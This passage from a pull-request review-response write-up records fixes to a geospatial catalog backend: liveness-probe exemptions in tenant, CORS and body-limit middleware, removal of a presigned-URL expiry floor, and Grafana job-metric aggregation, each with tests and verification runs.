**The finding.** In multi_tenant a probe sent to a tenant hostname goes through `TenantContextMiddleware`, which resolves the host through the public tenant registry in the database. With the database unreachable that fails and the middleware answers `403`, so an orchestrator restarts an API that is alive and would have served catalog reads — the restart loop the readiness/liveness split exists to prevent. The exemption sits **before the Host checks**, not just before the registry lookup: `_classify_tenant_host` rejects an untrusted Host with a `400`, and a kubelet probing by pod IP sends exactly that, so exempting only the lookup would have left a second way to fail the probe.

**Two more on the same path.** `DynamicCORSMiddleware` reads `CORS_ALLOWED_ORIGINS` from the database whenever its 60s cache has expired, on any request carrying an `Origin` header; a probe is not a browser resource and now passes straight through, which this middleware already does whenever an origin is not permitted. `RequestBodyLimitMiddleware` calls `_refresh_limit_cache()` on every request before it looks at the path; that one is failure-tolerant and falls back, so an outage does not *fail* the probe, but it does make it *wait* — once the 30s cache expires each request pays a connection attempt, and against a blackholed database that is the probe's whole timeout budget spent before the handler runs. The size cap still applies, from the cached or fallback value.

All three call one predicate in `app/api/middleware/liveness.py` rather than three copies of a path check that drift, which is the failure mode several earlier rounds on this PR were about. Matching is exact, strips an ASGI `root_path`, and accepts the `/api/` form for an edge that proxies without the rewrite the bundled Nginx does.

**The rest of the path, checked and needing nothing.** `SecurityHeadersMiddleware`, `RequestLoggingMiddleware`, `SessionMiddleware`, `GZipMiddleware` and `NoCompressionForExportMiddleware` perform no I/O. `SlowAPIMiddleware` calls `_should_exempt` before `_check_request_limit`, so an exempt route never evaluates a limit or touches the limiter's storage (Redis when `REDIS_URL` is set), and the route carries `@limiter.exempt` — now asserted rather than assumed. There is no auth middleware and no license/edition middleware; both are per-route dependencies and the liveness handler declares none, so no `get_db` and no pool checkout. The tenant GUC hook is an engine `begin` event that never fires, because nothing on this path opens a transaction.

Pins: `test_liveness_answers_200_in_multi_tenant_with_the_database_down` (the reproduction, asserting `200` and that the registry was never called); `test_readiness_still_resolves_the_tenant_in_multi_tenant` as the counterweight, so the exemption cannot widen into readiness; `test_every_db_backed_middleware_lets_the_probe_past`; `test_the_db_backed_middleware_list_is_the_whole_set`, which scans `api/middleware/` for anything importing `app.core.db` and fails naming a file not on the list; plus handler-side checks for dependencies, limiter exemption, and the predicate's own boundaries.

Two counterfactuals worth recording. Removing the tenant exemption fails the reproduction with the connection error propagating. Removing the CORS exemption fails the structural test — but only after tightening it: the first version asserted the bare symbol `is_liveness_request`, which the import line alone satisfies, so deleting the only call site left it green. It now checks `is_liveness_request(` with the paren.

No `_MODULE_LOC_CAPS` entry moved in round 7: the three edited middlewares and the new 57-line module are all uncapped.

Round-7 verification, from this worktree against Postgres at localhost:5434:

- `uv run pytest tests/test_health_liveness_split_1778.py tests/test_tenant_host_boundary.py tests/test_middleware.py tests/test_phase_273_middleware_order.py -q` — 47 passed
- `uv run pytest tests/test_layering.py tests/test_rule1_structural.py tests/test_rule2_structural.py tests/test_1184_body_limit_per_route.py tests/test_cors_range_headers_1540.py tests/test_cors_vary_origin_1602.py tests/test_search_cors_1596.py -q` — 255 passed
- `uv run pytest tests/test_health.py tests/test_datasets.py tests/test_auth.py tests/test_tenant_session_guc.py tests/test_sandbox.py -q` — 252 passed
- `cd backend && uv run ruff check . && uv run ruff format --check .` — clean
- `PYTHONPATH=. uv run python scripts/dump_openapi.py --check` — snapshot unchanged

## Codex round 8

Two P2s on head 4b7a4cfb2.

### The presign floor outlived the token it was bounded to (c3a76e0ae)

The first pass at the COG presign put a 60-second floor under the window to absorb clock skew, so a download token with one second left still minted a URL good for a minute against a private COG — the defect the change was written to remove, one order of magnitude smaller.

This repository had already settled the argument. `require_signable_job_lifetime` in `processing/ingest/presigned.py`, from #1235 r4: "`ExpiresIn` is relative to SIGNING time, so flooring at 1 mints a URL that is USABLE for one more second — past the deadline this whole change exists to enforce. There is no `ExpiresIn` value that means 'already dead': the only way to avoid handing out a live URL is to not sign one." A 60-second floor is that argument ignored 60 times over.

The window is now `min(ceiling, remaining)` with no floor, and below SigV4's own bound on `X-Amz-Expires` — one second — the answer is `401`, because the authorizing credential expired between the dependency that verified it and this redirect. `int()` truncates toward zero, so 1.9 seconds of token signs a one-second URL and never a two-second one.

Sweep of every presign site: both upload doors (`processing/ingest/router.py`, `router_reupload.py`, put and part) already go through `sign_url_with_deadline` → `require_signable_job_lifetime`, which **refuses** below a minimum rather than flooring — the pattern this adopts. The backup scripts mint no presigned URLs; they shell out to the `aws` CLI.

`platform/assets/urls.py::resolve_asset_url` is **noticed and left unchanged**, with its shape stated rather than waved through: it presigns published STAC assets on s3 with a 3600s TTL, and there is no short-lived per-caller token to outlive, so the floor defect does not apply. What it does have is the same *shape* with a different authorizer — unpublishing a record leaves an already-minted URL live for up to an hour. That is a TTL policy question with no bounding credential to shorten it to, not this bug, and it is out of scope here.

The invariant is pinned as raise-or-fit across the boundary rather than as an outcome per input, because at exactly one second left the answer races the function's own clock read and both outcomes are safe: a 401 hands out nothing, a one-second signature dies before the token does. `test_a_live_token_still_gets_a_signature` sits beside it so the invariant cannot be satisfied by always refusing. One thing corrected along the way: the first version of the assertion re-read the clock *after* the call, which is stricter than the code can be and flaked at 1.0s — the bound has to be the read *before* the call, since that lower-bounds the function's own read.

Counterfactual: restoring the floor fails 8 of the 10 parametrizations (ran it, then restored).

### The dashboard still read the job series per replica (7f5431876)

Round 4 summed the job counters in the alert and made the worker scrape job discover every replica, and left the Grafana dashboard reading them bare — so the discovery fix turned the Job throughput panel into one partial rate per replica, all labelled by queue alone. Both throughput targets now `sum by (queue)`.

The sweep found two more, needing the **opposite** aggregator. `geolens_jobs_queue_depth` and `geolens_jobs_active` were bare too; they are gauges polled from `procrastinate_jobs`, so every replica reports the same number and `max by (queue)` reads one queue's depth while `sum by (queue)` would multiply it by the replica count. That is what `GeoLensJobQueueBacklog` already does, now written down beside the constant the tests iterate so the two aggregators cannot be swapped by someone applying "sum everything" uniformly.

Nothing else in `infra/monitoring/` qualifies: the remaining `rate()` expressions read `http_requests_total`, the latency histograms and the tile-cache counters, all from the API — one static scrape target, with `PROMETHEUS_MULTIPROC_DIR` unifying its uvicorn workers — and all already wrapped in `sum` or `sum by`.

There was no dashboard validation of any kind, so the checks join `test_alert_rules.py`, which already covers `alerts.yml` and `prometheus.yml`: counters must aggregate outside their range function, gauges must use `max by` and not `sum by`, and one pass over alerts and panels together fails on any expression naming a job metric without an aggregator, so a metric added to one file and not the other cannot slip through. Each asserts it matched something, so a rename fails loudly rather than passing vacuously. Counterfactual: reverting one counter target and one gauge target fails all three (ran it, then restored). The dashboard joins the backend CI path filter for the same reason `prometheus.yml` did.

Cap moved in round 8, re-measured with `wc -l`: `backend/app/modules/catalog/datasets/api/router_export.py` 1602 → 1632, for the refusal that replaced the floor and the reason it has to be a refusal.

Round-8 verification, from this worktree against Postgres at localhost:5434:

- `uv run pytest tests/test_layering.py tests/test_cog_presign_lifetime_1778.py tests/test_alert_rules.py -q` — 93 passed
- `uv run pytest tests/test_cog_download_access.py tests/test_cog_s3_head_wire_1540.py tests/test_phase_273_cog_redirect_revalidate.py tests/test_download_token.py tests/test_phase_273_download_token.py tests/test_rule1_structural.py tests/test_rule2_structural.py -q` — 133 passed, 4 skipped
- `uv run pytest tests/test_export.py tests/test_export_access.py tests/test_export_hardening.py tests/test_export_head_1513.py tests/test_export_request_budget.py -q` — 119 passed
- `promtool test rules infra/monitoring/alerts.test.yml` — SUCCESS
- `cd backend && uv run ruff check . && uv run ruff format --check .` — clean
- `PYTHONPATH=. uv run python scripts/dump_openapi.py --check` — snapshot unchanged
